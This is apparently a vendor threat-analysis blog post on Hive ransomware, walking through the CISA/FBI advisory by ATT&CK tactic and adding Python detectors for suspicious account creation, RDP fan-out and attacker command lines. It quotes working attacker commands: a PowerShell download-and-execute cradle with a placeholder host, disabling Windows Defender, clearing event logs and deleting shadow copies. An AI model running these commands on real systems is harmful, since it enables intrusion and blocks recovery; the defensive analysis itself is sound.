CISA Alert AA22-321A: Hive Ransomware Analysis, Simulation, TTPs & IOCs

On November 17, 2022, CISA and FBI released a joint advisory on Hive ransomware [1]. Hive ransomware group follows the Ransomware-as-a-Service model (RaaS) and targets a wide range of businesses and critical infrastructure sectors such as telecommunications, manufacturing, IT, and the healthcare sector. 

Picus Threat Library already had attack simulations for earlier variants of Hive ransomware. Picus Labs swiftly added attack simulations for the newer variants of Hive ransomware to Picus Threat Library.

Hive Ransomware Group

According to the FBI, as of November 2022, Hive ransomware has victimized more than 1300 companies, resulting in $100 million US dollars paid in ransom. Hive ransomware follows the Ransomware-as-a-Service model (RaaS), letting its affiliates use the ransomware as they wish. The developers of Hive continuously create, maintain and update the malware, adding new defense evasion capabilities such as evading anti-malware protections.

The victim statistics show that threat actors leveraging the Hive ransomware target a wide range of businesses and critical infrastructure sectors such as telecommunications, manufacturing, information technology, and healthcare. 

Hive Ransomware Analysis and MITRE ATT&CK TTPs

Tactic: Initial Access

How Hive actors gain their initial foothold on a target's systems differs depending on the affiliate using the RaaS. In some cases, threat actors leveraged external-facing remote services such as Remote Desktop Protocol (RDP), Virtual Private Networks (VPNs), and other remote network connection protocols (ATT&CK T1133). In other cases, they bypassed Multi-Factor Authentication (MFA) on FortiOS servers by exploiting an improper authentication vulnerability (CVE-2020-12812) in the FortiOS SSL VPN, which allowed them to log in without providing the second authentication factor (FortiToken).

Another initial access method used by Hive threat actors is phishing emails with malicious attachments that exploit the ProxyShell vulnerabilities (ATT&CK T1190).

Further analysis shows that Hive actors manage to deploy a webshell on the compromised Windows Exchange Server. 

Figure 1:  Deploying a webshell on the compromised Windows Exchange Server [1]

Patches for these three ProxyShell vulnerabilities were released in April and May 2021 as part of Microsoft's "Patch Tuesday" releases.

Tactic: Execution 

After establishing initial access to the compromised Windows Exchange Server, the Hive ransomware group executes PowerShell commands to download malicious binaries from their Command and Control (C2) server (ATT&CK T1059). Adversaries download the malware directly into the compromised host's memory and execute it using PowerShell's Invoke-Expression (IEX) cmdlet, so no file is written to disk.

IEX (New-Object Net.WebClient).DownloadString('')

Example 1: Downloading and executing malware using the Invoke-Expression cmdlet 

In addition, Hive actors download and execute a further obfuscated PowerShell script, which later analysis identified as part of the Cobalt Strike framework. On VirusTotal, the malicious file is flagged by 41 out of 69 detection engines.

Figure 2: VirusTotal result of the malicious file downloaded by Hive ransomware group

Tactic: Persistence 

Adversaries establish persistence by creating a new user called "user" and adding it to both the "Remote Desktop Users" and "Administrators" groups (ATT&CK T1136). This action also gives the new user NT AUTHORITY\SYSTEM privileges. Later, the adversaries used this account to access critical files containing valid user credentials, to gain RDP access to backup servers, and so on.
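The account creation described above leaves a recognizable trail in the Windows Security log: a 4720 ("A user account was created") event followed within seconds by 4732 ("A member was added to a security-enabled local group") events for the Administrators and Remote Desktop Users groups. The following Python detection is an added example written for this article; it is not code from the advisory, from Picus, or from the Hive analysis it cites. The events are constructed with a simplified field set (real 4732 events carry the member as a SID and a distinguished name, which is normalized here to DOMAIN\user), and the 10-minute correlation window is an assumed tuning value.

```python
from datetime import datetime, timedelta

# Constructed Windows Security events with a simplified field set (not taken from the advisory):
# 4720 = "A user account was created", 4732 = "A member was added to a security-enabled local group".
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2022-11-10T09:12:03", "Computer": "EXCH01",
     "SubjectUserName": "svc_exchange", "TargetUserName": "user"},
    {"EventID": 4732, "TimeCreated": "2022-11-10T09:12:07", "Computer": "EXCH01",
     "MemberName": "EXCH01\\user", "TargetUserName": "Administrators"},
    {"EventID": 4732, "TimeCreated": "2022-11-10T09:12:09", "Computer": "EXCH01",
     "MemberName": "EXCH01\\user", "TargetUserName": "Remote Desktop Users"},
    # Routine pattern: helpdesk creates an account and grants RDP access hours later.
    {"EventID": 4720, "TimeCreated": "2022-11-10T11:00:00", "Computer": "DC01",
     "SubjectUserName": "helpdesk", "TargetUserName": "jdoe"},
    {"EventID": 4732, "TimeCreated": "2022-11-10T14:30:00", "Computer": "DC01",
     "MemberName": "DC01\\jdoe", "TargetUserName": "Remote Desktop Users"},
]

# Local groups whose membership grants interactive or administrative access.
WATCHED_GROUPS = {"administrators", "remote desktop users"}


def _when(event):
    return datetime.fromisoformat(event["TimeCreated"])


def find_suspicious_account_creations(events, window_minutes=10, watched_groups=WATCHED_GROUPS):
    """Return one alert per newly created account that was added to a watched local
    group on the same host within window_minutes of its creation (ATT&CK T1136)."""
    creations = [e for e in events if e["EventID"] == 4720]
    additions = [e for e in events if e["EventID"] == 4732]
    alerts = []
    for created in creations:
        created_at = _when(created)
        deadline = created_at + timedelta(minutes=window_minutes)
        account = created["TargetUserName"].lower()
        groups = set()
        for add in additions:
            # In a 4732 event the group is in TargetUserName and the new member in MemberName.
            member = add["MemberName"].split("\\")[-1].lower()
            group = add["TargetUserName"]
            if (add["Computer"] == created["Computer"]
                    and member == account
                    and group.lower() in watched_groups
                    and created_at <= _when(add) <= deadline):
                groups.add(group)
        if groups:
            alerts.append({
                "technique": "T1136",
                "computer": created["Computer"],
                "account": created["TargetUserName"],
                "created_by": created["SubjectUserName"],
                "groups": sorted(groups),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_account_creations(SAMPLE_EVENTS):
        print(alert)
```

Only the "user" account on EXCH01 is flagged: it received both group memberships within seconds of creation, while the helpdesk-created account was added to Remote Desktop Users three and a half hours later and falls outside the window. Widening the window trades fewer misses for more noise from legitimate provisioning.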

Tactic: Credential Access 

Next, Hive actors use Mimikatz's sekurlsa::logonpasswords module to dump NTLM hashes (ATT&CK T1003) of all the accounts currently logged into the system and use the Administrator's NTLM hash to perform a Pass-the-Hash (PtH) attack.

Figure 3: Pass-the-Hash Attack [1]

Tactic: Lateral Movement

Using the stolen credentials, adversaries run the "mstsc.exe /v:target_computer_name" command to open RDP sessions (ATT&CK T1021.001) to many devices within the same network. This ensures the attackers have access to the critical databases before deploying the ransomware, and therefore maximizes the impact.
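The lateral movement pattern above, one account opening RDP sessions to many hosts in a short period, can be caught by counting distinct destination hosts per account in a sliding time window over 4624 logon events with LogonType 10 (RemoteInteractive). The Python below is an added example, not code from the advisory or from Picus; the logon records are constructed and reduced to (time, account, source IP, destination host), and the threshold of five hosts in 30 minutes is an assumed tuning value that should be set from a baseline of normal administrative activity.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4624 LogonType 10 (RDP) events, reduced to (time, account, source IP, destination
# host). Not taken from the advisory; the burst from 10.0.0.5 models the behaviour described above.
RDP_LOGONS = [
    ("2022-11-10T10:00:05", "CORP\\Administrator", "10.0.0.5", "FS01"),
    ("2022-11-10T10:02:41", "CORP\\Administrator", "10.0.0.5", "DB01"),
    ("2022-11-10T10:03:10", "CORP\\jdoe", "10.0.1.7", "WS22"),
    ("2022-11-10T10:04:58", "CORP\\Administrator", "10.0.0.5", "DB02"),
    ("2022-11-10T07:15:00", "CORP\\Administrator", "10.0.0.9", "WS07"),  # hours earlier: outside window
    ("2022-11-10T10:08:22", "CORP\\Administrator", "10.0.0.5", "BK01"),
    ("2022-11-10T10:11:49", "CORP\\Administrator", "10.0.0.5", "APP01"),
    ("2022-11-10T10:40:00", "CORP\\jdoe", "10.0.1.7", "WS23"),
]


def detect_rdp_fanout(logons, min_hosts=5, window_minutes=30):
    """Flag accounts that open RDP sessions to at least min_hosts distinct hosts within
    any window_minutes-long window (ATT&CK T1021.001). Returns one alert per account."""
    by_account = defaultdict(list)
    for ts, account, src, dst in logons:
        by_account[account].append((datetime.fromisoformat(ts), src, dst))
    window = timedelta(minutes=window_minutes)
    alerts = []
    for account, events in by_account.items():
        events.sort()  # events may arrive out of order; sort by timestamp
        start = 0
        for end in range(len(events)):
            # Advance the window start until the span [start, end] fits in window_minutes.
            while events[end][0] - events[start][0] > window:
                start += 1
            in_window = events[start:end + 1]
            hosts = {dst for _, _, dst in in_window}
            if len(hosts) >= min_hosts:
                alerts.append({
                    "technique": "T1021.001",
                    "account": account,
                    "sources": sorted({src for _, src, _ in in_window}),
                    "hosts": sorted(hosts),
                    "first": in_window[0][0].isoformat(),
                    "last": in_window[-1][0].isoformat(),
                })
                break  # one alert per account is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_fanout(RDP_LOGONS):
        print(alert)
```

The Administrator account trips the rule on its fifth distinct host within twelve minutes; the earlier logon to WS07 is correctly excluded because it lies hours outside the window, and the two logons by jdoe never reach the threshold. Backup servers and database hosts appearing in the "hosts" list are the ones to isolate first, given the campaign's focus on them.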

Tactic: Discovery

Hive actors list all the domain-joined assets into a file called domains.txt using the SoftPerfect tool. Then, they execute a batch script called p.bat that pings each discovered asset once to check whether it is alive.

for /f %%i in (domains.txt) do ping %%i -n 1 >> res.txt

Example 2: Command in the p.bat script

Tactic: Defense Evasion

The Hive ransomware group distributes a file with a benign-looking name, "windows.exe", to compromised hosts in the victim's network. In reality, this file is the ransomware payload, written in the Go language. The "windows.exe" payload uses several defense evasion techniques.

  • Impair Defenses: Disable or Modify Tools (ATT&CK T1562.001)

net.exe stop "SamSs" /y

Example 3: Stopping Security Accounts Manager to prevent alarming SIEM systems

  • Modify Registry (ATT&CK T1112)

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

Example 4: Disabling Windows Defender via Registry Tool

  • Indicator Removal (ATT&CK T1070)

wevtutil.exe cl security
wevtutil.exe cl system
wevtutil.exe cl application

Example 5: Clearing Windows Security Event Logs

Tactic: Exfiltration 

Prior to the encryption process, the Hive ransomware group exfiltrates sensitive data from the victim host using a combination of rclone and a cloud storage service (ATT&CK T1537).

Tactic: Impact

vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy /nointeractive
wmic.exe shadowcopy delete

Example 6: Deleting volume shadow copies to inhibit system recovery (ATT&CK T1490)
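The command lines quoted in the Execution, Defense Evasion and Impact sections (Examples 1 and 3 to 6) are distinctive enough to serve as detection content for process-creation telemetry such as Sysmon Event ID 1 or Windows Security Event ID 4688. The Python rule set below is an added example written for this article, not code from the advisory, from Picus, or from any detection product; the regular expressions are derived only from the command lines shown above, the sample command lines are constructed (the download cradle uses a placeholder URL, since the article redacts the real one), and the technique IDs are the ones this article assigns.

```python
import re

# Detection rules derived from the command lines quoted in this article. Each entry is
# (ATT&CK technique as given in the article, description, pattern over the full command line).
RULES = [
    ("T1059", "PowerShell download cradle: IEX over DownloadString",
     re.compile(r'(?:\b(?:iex|invoke-expression)\b.*downloadstring)'
                r'|(?:downloadstring.*\b(?:iex|invoke-expression)\b)', re.I)),
    ("T1562.001", "Stopping the Security Accounts Manager service (SamSs)",
     re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+"?samss"?', re.I)),
    ("T1112", "Disabling Windows Defender through the DisableAntiSpyware policy value",
     re.compile(r'\breg(?:\.exe)?\s+add\s+.*windows defender.*disableantispyware.*/d\s+"?1"?', re.I)),
    ("T1070", "Clearing the Security, System or Application event log",
     re.compile(r'\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+(?:security|system|application)\b', re.I)),
    ("T1490", "Deleting volume shadow copies",
     re.compile(r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b', re.I)),
]


def classify(cmdline):
    """Return the technique IDs whose rule matches the command line (empty list if none)."""
    return [technique for technique, _, pattern in RULES if pattern.search(cmdline)]


def scan(cmdlines):
    """Return one record per command line that matched at least one rule."""
    hits = []
    for line in cmdlines:
        techniques = classify(line)
        if techniques:
            hits.append({"cmdline": line, "techniques": techniques})
    return hits


# Constructed process command lines: the article's examples (with a placeholder C2 URL in the
# download cradle) mixed with benign administrative commands that must not raise an alert.
SAMPLE_COMMAND_LINES = [
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/payload.ps1')",
    'net.exe stop "SamSs" /y',
    'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    "wevtutil.exe cl security",
    "vssadmin.exe delete shadows /all /quiet",
    "wmic.exe shadowcopy delete",
    "wevtutil.exe qe security /c:5 /f:text",  # benign: reads the log instead of clearing it
    "net.exe start spooler",  # benign
    'reg.exe query "HKLM\\Software\\Policies\\Microsoft\\Windows Defender"',  # benign: query, not add
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(hit["techniques"], hit["cmdline"])
```

Six of the nine sample lines match, each to the technique the article assigns, while the three benign commands that share an executable name with the malicious ones (reading a log, starting a service, querying the Defender key) fall through. Matching on arguments rather than on the binary alone is what keeps such rules usable on production telemetry, where net.exe, reg.exe and wevtutil.exe run constantly for legitimate reasons.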

Once the commands above have run, the encryption process starts. During encryption, the ransomware drops a key file (*.key) required for decryption in the root directory of the target system [2]. It then creates the ransom note file, HOW_TO_DECRYPT.txt, which states that the key file is required for decryption and that any attempt to modify, rename or delete it will turn the recovery phase into a dead end (ATT&CK T1486).

Figure 4: Hive ransom note [1]

Like other ransomware groups that use the double-extortion model, Hive ransomware leaks sensitive information on their website called "HiveLeaks" if their victims do not pay the ransom.

How Does Picus Help Simulate Hive Ransomware Attacks?

Picus Threat Library already had threats for the Hive ransomware used in the earlier attack campaigns. Picus Labs added attack simulations for the latest variant of Hive ransomware. We strongly suggest simulating Hive ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus Complete Security Validation Platform. You can test your defenses against Hive ransomware and many other ransomware families within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Hive ransomware:

Threat ID | Action Name | Attack Module
(not shown) | Hive Ransomware Campaign | (not shown)
(not shown) | Hive Ransomware Download Threat | Network Infiltration
(not shown) | Hive Ransomware Email Threat | Email Infiltration

Indicators of Compromise (IOCs)


[1] N. Ovadia, "Hive Ransomware Analysis," Apr. 19, 2022. [Accessed: Dec. 08, 2022]

[2] "#StopRansomware: Hive Ransomware." [Accessed: Dec. 08, 2022]